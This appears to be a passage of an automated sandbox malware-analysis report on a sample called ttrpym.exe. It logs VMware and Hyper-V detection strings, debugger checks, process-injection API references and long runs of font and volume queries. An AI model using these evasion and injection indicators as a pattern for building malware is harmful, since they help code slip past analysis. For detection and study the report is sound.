              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeLast function: Thread delayed
              Source: ttrpym.exe, 00000000.00000002.264861199.0000000003030000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: VMWARE
              Source: ttrpym.exe, 00000003.00000003.469859605.000000000122C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
              Source: ttrpym.exe, 00000000.00000002.264819317.0000000002FEF000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: ttrpym.exe, 00000000.00000002.264819317.0000000002FEF000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: ttrpym.exe, 00000000.00000002.264861199.0000000003030000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: $l"SOFTWARE\VMware, Inc.\VMware Tools
              Source: ttrpym.exe, 00000000.00000002.264819317.0000000002FEF000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: $l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_004119BE _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_004119BE
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00401470 _getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,CloseHandle,Module32Next,CloseHandle,CloseHandle,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,_memset,LoadLibraryA,GetProcAddress,CLRCreateInstance,GetProcAddress,GetModuleFileNameA,GetModuleFileNameW,3_2_00401470
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00401470 _getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,CloseHandle,Module32Next,CloseHandle,CloseHandle,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,_memset,LoadLibraryA,GetProcAddress,CLRCreateInstance,GetProcAddress,GetModuleFileNameA,GetModuleFileNameW,3_2_00401470
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00405550 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualAlloc,VirtualAlloc,3_2_00405550
              Source: C:\Users\user\Desktop\ttrpym.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_004154E1 SetUnhandledExceptionFilter,3_2_004154E1
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_004119BE _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_004119BE
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00415C0B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00415C0B
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00418E39 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00418E39
              Source: C:\Users\user\Desktop\ttrpym.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              .NET source code references suspicious native API functionsShow sources
              Source: 3.2.ttrpym.exe.f80000.2.unpack, e3nXyWx54eXrMCJOPu/eAcKHQHop2SvdpjExo.csReference to suspicious API methods: ('eus1wv2xX', 'WriteProcessMemory@kernel32.dll'), ('eV0SEIQ9r', 'ReadProcessMemory@kernel32.dll'), ('eJNVII0RA', 'FindResource@kernel32.dll'), ('eL9ir86aw', 'LoadLibrary@kernel32'), ('eGN9hjVJU', 'VirtualProtect@kernel32.dll'), ('ev28wIJF8', 'GetProcAddress@kernel32'), ('ekpmC2OjU', 'VirtualProtect@kernel32.dll'), ('ewSXdJPgZ', 'OpenProcess@kernel32.dll')
              Source: C:\Users\user\Desktop\ttrpym.exeProcess created: C:\Users\user\Desktop\ttrpym.exe {path}Jump to behavior
              Source: ttrpym.exe, 00000003.00000002.617083257.0000000001B40000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
              Source: ttrpym.exe, 00000003.00000002.617083257.0000000001B40000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: ttrpym.exe, 00000003.00000002.617083257.0000000001B40000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: ttrpym.exe, 00000003.00000002.617083257.0000000001B40000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: GetLocaleInfoA,3_2_004198F0
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Users\user\Desktop\ttrpym.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
